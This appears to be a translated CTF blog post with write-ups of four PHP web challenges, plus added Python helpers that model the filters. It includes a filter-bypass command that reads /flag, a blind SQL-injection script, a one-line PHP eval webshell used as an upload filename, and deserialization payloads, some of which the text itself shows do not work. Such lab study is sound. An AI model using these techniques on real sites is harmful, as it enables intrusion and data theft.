BUU CTF Learn 3

Well then. The encoding of the previous post got garbled and I have no idea why, so let's start a new one!

[安洵杯 2019]easy_web

Key points:

base64 encoding

regex bypass

Solution:

Opening it shows a black page.

The URL contains something that looks like base64.

Decode it:

TXpVek5UTTFNbVUzTURabE5qYz0

MzUzNTM1MmU3MDZlNjc=

3535352e706e67

hex to string: 555.png

So this is probably a file read.

Try reading index.php:

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
     header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
 
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
     echo '<img src ="./ctf3.jpeg">';
     die("xixi~ no flag");
} else {
     $txt = base64_encode(file_get_contents($file));
     echo "<img src='data:image/gif;base64," . $txt . "'></img>";
     echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
     echo("forbid ~");
     echo "<br>";
} else {
     if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
          echo `$cmd`;
     } else {
          echo ("md5 is funny ~");
     }
}
?>

Source audit (I want to throw up)

You can see a ton of commands are filtered.

But the cmd at the bottom can be used to read files.

Satisfy the md5 check with a precomputed MD5 collision pair: a and b must differ as strings while their md5() outputs compare equal with ===, so this needs two genuinely different 64-byte blocks with the same digest, sent URL-encoded as POST fields a and b:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

With that many commands filtered, how do we read the flag?

Local testing found that ca\t /flag is not filtered.

Send it and the flag is in the page source!
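The following Python is an added example (mine, not from the original post) that mirrors the three checks in index.php so they can be exercised offline: the img decoding chain with re-padding (PHP's base64_decode ignores a missing trailing =, Python's does not), the filename sanitizer, the cmd blacklist written as PCRE receives it after PHP's double-quote escape processing, and the MD5 pair from above. The blacklist is also why ca\t works: in the PHP source `\\|\\\\|` becomes the pattern `\|\\|`, which PCRE reads as one alternative matching the two-byte sequence `|\`, so a lone backslash is never rejected, and the shell then drops it before running cat. Only the filter text, the img value and the collision pair come from the page; the function names are my own.

```python
import base64
import binascii
import hashlib
import re
from urllib.parse import unquote_to_bytes


def _b64d(s: str) -> bytes:
    # PHP's base64_decode() accepts input with the trailing '=' stripped (the img in the URL
    # is 27 characters long); Python's does not, so restore the padding before decoding.
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(img: str) -> str:
    """hex2bin(base64_decode(base64_decode($img))), as index.php computes $file."""
    return binascii.unhexlify(_b64d(_b64d(img).decode())).decode()


def encode_img(name: str) -> str:
    """Build an img value that the page decodes back to name, e.g. index.php."""
    return base64.b64encode(base64.b64encode(binascii.hexlify(name.encode()))).decode()


def php_img_filter(name: str):
    """The PHP side: keep only [a-zA-Z0-9.] (so no path separators survive), then refuse any
    name containing 'flag'. Returns what reaches file_get_contents(), or None for 'no flag'."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", name)
    return None if re.search(r"flag", name, re.I) else name


# The blacklist exactly as PCRE sees it once PHP has processed the double-quoted string:
# \\|\\\\  ->  \|\\  ->  a single alternative matching "|\" (pipe followed by backslash).
CMD_FILTER = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|"
    r"pcre|paste|diff|file|echo|sh|'|\"|`|;|,|\*|\?|\|\\|"
    "\n|\t|\r|\xA0|"
    r"\{|\}|\(|\)|\&[^\d]|@|\||\$|\[|\]|{|}|\(|\)|-|<|>",
    re.I,
)


def cmd_forbidden(cmd: str) -> bool:
    """True when index.php would answer 'forbid ~' instead of running the command."""
    return CMD_FILTER.search(cmd) is not None


# The MD5 collision pair from the page (the URL-encoded POST values a and b).
MD5_PAIR_A = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF"
              "%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2")
MD5_PAIR_B = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF"
              "%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")


def md5_pair_collides(a_enc: str, b_enc: str) -> bool:
    """(string)$a !== (string)$b && md5($a) === md5($b): bytes differ, digests do not."""
    a, b = unquote_to_bytes(a_enc), unquote_to_bytes(b_enc)
    return a != b and hashlib.md5(a).digest() == hashlib.md5(b).digest()


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))   # the img value from the URL
    print(encode_img("index.php"))                       # img value that reads the source
    for cmd in ("cat /flag", "ca\\t /flag", "sort /flag", "a|b"):
        print(repr(cmd), "forbid" if cmd_forbidden(cmd) else "allowed")
    print(md5_pair_collides(MD5_PAIR_A, MD5_PAIR_B))
```

Note that php_img_filter strips slashes, so img can only name files in the web root's working directory, and anything with flag in it is refused before the read; that is why the flag has to come through cmd instead.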

 

[CISCN2019 总决赛 Day2 Web1]Easyweb

Key points:

Solution:

It opens on a login form; after various login attempts returned 500, a directory scan found robots.txt,

which points to image.php.bak:

<?php
include "config.php";
 
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
 
$id=addslashes($id);
$path=addslashes($path);
 
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
 
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
 
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

Source audit (ugh, auditing again)

// Something seems wrong with this challenge, I can't get it to run

 

import requests

# Boolean-based blind SQL injection through image.php.
# id=\0 survives addslashes() + str_replace() as a lone backslash, which escapes the closing
# quote of id='...', so the path parameter ends up outside the string literal.
url = "http://31cc2ff3-7be1-484e-b9bc-d665bf705ad6.node3.buuoj.cn/image.php?id=\\0&path="
# If the condition holds, if() returns 1, "or id=1" selects the first image and the response
# is a JPEG (it contains the "JFIF" marker); otherwise nothing comes back.
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""

for i in range(1, 100):
    # binary search for the ASCII code of the i-th character of username
    l = 1
    r = 130
    mid = (l + r) >> 1
    while l < r:
        payloads = payload.format(i, mid)
        print(url + payloads)
        html = requests.get(url + payloads)
        if "JFIF" in html.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    if mid == 1:
        # ascii('') is 0, so every comparison failed: we are past the end of the string
        break
    result += chr(mid)
    print(result)
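Added example, not part of the original post: a Python model of image.php's input handling plus the binary search from the script above, run against a constructed local oracle so the search logic can be checked without the target. php_sanitize reproduces addslashes() followed by the str_replace() list in array order, build_query shows the SQL that results, and blind_extract is the generalized search (it takes any oracle that answers whether ascii(substr(secret,pos,1)) > threshold). The users table comes from the script; the secret username `admin`, the oracle and the function names are my constructed assumptions.

```python
def php_addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_sanitize(s: str) -> str:
    """addslashes() followed by the page's str_replace(); the replacements run in array order.
    A quote is first escaped to \\' and then deleted, so no quote ever reaches the query, but
    the input \\0 (backslash, zero) becomes \\\\0, loses its \\0 and leaves a bare backslash."""
    s = php_addslashes(s)
    for needle in ("\\0", "%00", "\\'", "'"):
        s = s.replace(needle, "")
    return s


def build_query(id_param: str, path_param: str) -> str:
    """The SQL string image.php executes (parameters already URL-decoded by PHP)."""
    return "select * from images where id='%s' or path='%s'" % (
        php_sanitize(id_param), php_sanitize(path_param))


def make_payload(pos: int, threshold: int) -> str:
    """The path= value the script sends; '#' has to travel as %23 in the URL."""
    return "or id=if(ascii(substr((select username from users),%d,1))>%d,1,0)#" % (
        pos, threshold)


def blind_extract(oracle, max_len: int = 64) -> str:
    """Recover a string one character at a time with binary search. oracle(pos, threshold)
    must return True exactly when ascii(substr(secret, pos, 1)) > threshold."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # MySQL's ascii('') is 0: we ran off the end of the string
            break
        result += chr(lo)
    return result


SECRET_USERNAME = "admin"   # constructed stand-in for users.username


def local_oracle(pos: int, threshold: int) -> bool:
    """Constructed oracle answering what the injected if() would make the server reveal."""
    ch = SECRET_USERNAME[pos - 1:pos]
    return (ord(ch) if ch else 0) > threshold


if __name__ == "__main__":
    print(build_query("\\0", make_payload(1, 64)))
    print(blind_extract(local_oracle))
```

Against the real target the oracle would be the HTTP request from the script above, returning `"JFIF" in response.text`; everything else stays the same.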

The table name here was guessed. After logging in successfully, upload a one-line webshell into the log file (the upload page records the submitted filename, so the filename is the payload), then connect with AntSword (蚁剑) to get the flag.

Filename: <?=@eval($_POST['a']);?>

Then you have the flag.

[安洵杯 2019]easy_serialize_php

Key points:

Deserialization

Solution:

 

<?php
 
$function = @$_GET['f'];
 
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
 
 
if($_SESSION){
    unset($_SESSION);
}
 
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
 
extract($_POST);
 
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
 
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
 
$serialize_info = filter(serialize($_SESSION));
 
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

The source is shown right on opening; audit it.

The comment hints that phpinfo may hold something, so look there.

It reveals that the flag is stored at d0g3_f1ag.php.

payload: _SESSION[user]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

(The img value decodes to /d0g3_fllllllag. The idea is that filter() deletes php and flag from the serialized string while the declared length s:76: stays, so unserialize() reads past the real value into the img element the server appends afterwards.)

I haven't found the deserialization entry point for this one yet; I'll keep looking.
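Added example (mine, not from the post or the challenge): a Python model of what index.php?f=show_image does with the posted session, so payloads can be checked offline. php_serialize and php_unserialize cover the subset PHP produces here (strings, ints, string-keyed arrays) with PHP's strict rules: a string must be exactly its declared length and be followed by `";`, and an array must hold exactly the declared number of pairs. Run through it, the payload above fails: the declared 76 bytes swallow `";s:3:"img";s:` from the appended element and then land on `20` where `";` is required. Two payloads that do survive, computed from the same rules, are included for comparison: escaping through a filtered key, and value inflation with the arithmetic worked out. The img value is the page's; the key names and the dummy `dd` pair are my assumptions.

```python
import base64
import re


def php_serialize(value):
    """PHP serialize() for str, int and string-keyed arrays (lengths are byte lengths)."""
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError(type(value))


def _parse(d, i):
    t = d[i]
    if t == "s":                                     # s:<len>:"<bytes>";
        j = d.index(":", i + 2)
        n = int(d[i + 2:j])
        start = j + 2
        if d[j + 1] != '"' or d[start + n:start + n + 2] != '";':
            raise ValueError("bad string at %d" % i)
        return d[start:start + n], start + n + 2
    if t == "i":                                     # i:<int>;
        j = d.index(";", i + 2)
        return int(d[i + 2:j]), j + 1
    if t == "a":                                     # a:<count>:{key value ...}
        j = d.index(":", i + 2)
        n = int(d[i + 2:j])
        if d[j + 1] != "{":
            raise ValueError("bad array at %d" % i)
        pos, out = j + 2, {}
        for _ in range(n):
            k, pos = _parse(d, pos)
            v, pos = _parse(d, pos)
            out[k] = v
        if d[pos] != "}":
            raise ValueError("array count mismatch at %d" % pos)
        return out, pos + 1
    raise ValueError("unsupported type %r at %d" % (t, i))


def php_unserialize(data):
    """None where PHP's unserialize() returns false; trailing bytes are ignored as PHP does."""
    try:
        return _parse(data, 0)[0]
    except (ValueError, IndexError):
        return None


FILTER = re.compile(r"php|flag|php5|php4|fl1g", re.I)   # filter() from index.php


def show_image_session(post_session):
    """extract($_POST) replaces $_SESSION with the posted array, the server appends img
    (the no-img_path branch), then serialize -> filter -> unserialize."""
    session = dict(post_session)
    session["img"] = base64.b64encode(b"guest_img.png").decode()
    return php_unserialize(FILTER.sub("", php_serialize(session)))


TARGET_IMG = "L2QwZzNfZmxsbGxsbGFn"   # base64('/d0g3_fllllllag'), from the page's payload

# 1. The page's payload: 'phpflagphpflag' (14 bytes) is deleted but s:76: stays, so the reader
#    takes '";s:3:"img";s:' from the next element and then meets '20' instead of '";'.
PAGE_PAYLOAD = {"user": ';s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"%s";}' % TARGET_IMG}

# 2. Key escape: the key 'phpflag' is filtered to '' but keeps s:7:, so the parser reads
#    '";s:48:' as the key and our value supplies the img pair and the closing brace.
KEY_ESCAPE_PAYLOAD = {"phpflag": ';s:1:"1";s:3:"img";s:20:"%s";}' % TARGET_IMG}

# 3. Value inflation with the count right: 'flag'*6 shrinks to '' but keeps s:24:, which is
#    exactly '";s:8:"function";s:59:"a'; the dummy dd pair keeps the array at 3 elements.
INFLATION_PAYLOAD = {
    "user": "flag" * 6,
    "function": 'a";s:3:"img";s:20:"%s";s:2:"dd";s:1:"a";}' % TARGET_IMG,
}

if __name__ == "__main__":
    for name, p in (("page", PAGE_PAYLOAD), ("key escape", KEY_ESCAPE_PAYLOAD),
                    ("inflation", INFLATION_PAYLOAD)):
        print(name, "->", show_image_session(p))
```

The server-side f=show_image branch then calls file_get_contents(base64_decode($userinfo['img'])), so whichever payload deserializes with img under our control decides which file is read; the same construction with base64 of d0g3_f1ag.php reads that file first.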

 

[SUCTF 2019]EasyWeb

Key points

Solution

Again the source is handed over on opening:

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
        if(!exif_imagetype($tmp_name)) die("^_^");
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}
 
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');
 
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
 
eval($hhh);
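Added example (mine, not from the page or the challenge author): a Python reimplementation of the gates in front of eval(), usable offline to see which message a candidate payload would hit. The character class is written as a bytes regex because strlen() and count_chars() work on bytes; the range `\x00- ` covers NUL through space, and the bare `[` inside the class is a literal bracket. The candidate strings in the usage are constructed and none of them is a working bypass.

```python
import re

MAX_LEN = 18
MAX_DISTINCT = 12
# The class from preg_match('/[\x00- 0-9A-Za-z\'"`~_&.,|=[\x7F]+/i', $hhh)
BANNED = re.compile(rb'[\x00- 0-9A-Za-z\'"`~_&.,|=[\x7F]+', re.I)


def gate(payload: bytes) -> str:
    """Return the page's response to a candidate _ value, or 'eval' if it reaches eval()."""
    if not payload:
        return "source"                        # empty: highlight_file(__FILE__)
    if len(payload) > MAX_LEN:
        return "One inch long, one inch strong!"
    if BANNED.search(payload):
        return "Try something else!"
    if len(set(payload)) > MAX_DISTINCT:       # count_chars($hhh, 3) lists the distinct bytes
        return "Almost there!"
    return "eval"


def allowed_bytes() -> bytes:
    """Every single byte the regex lets through, in byte order."""
    return bytes(b for b in range(256) if not BANNED.search(bytes([b])))


if __name__ == "__main__":
    for candidate in (b"phpinfo();", b"$" * 19, b"!#$%()*+-/:;<>", b"$$;"):
        print(candidate, "->", gate(candidate))
    print(allowed_bytes()[:21], "plus", len(allowed_bytes()) - 21, "high bytes")
```

allowed_bytes() is the complement of the class: 21 printable ASCII characters and every byte from 0x80 upward, which is the only alphabet a payload within the 18-byte and 12-distinct-byte limits can be built from.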

Time to audit.

No idea; I'm out.
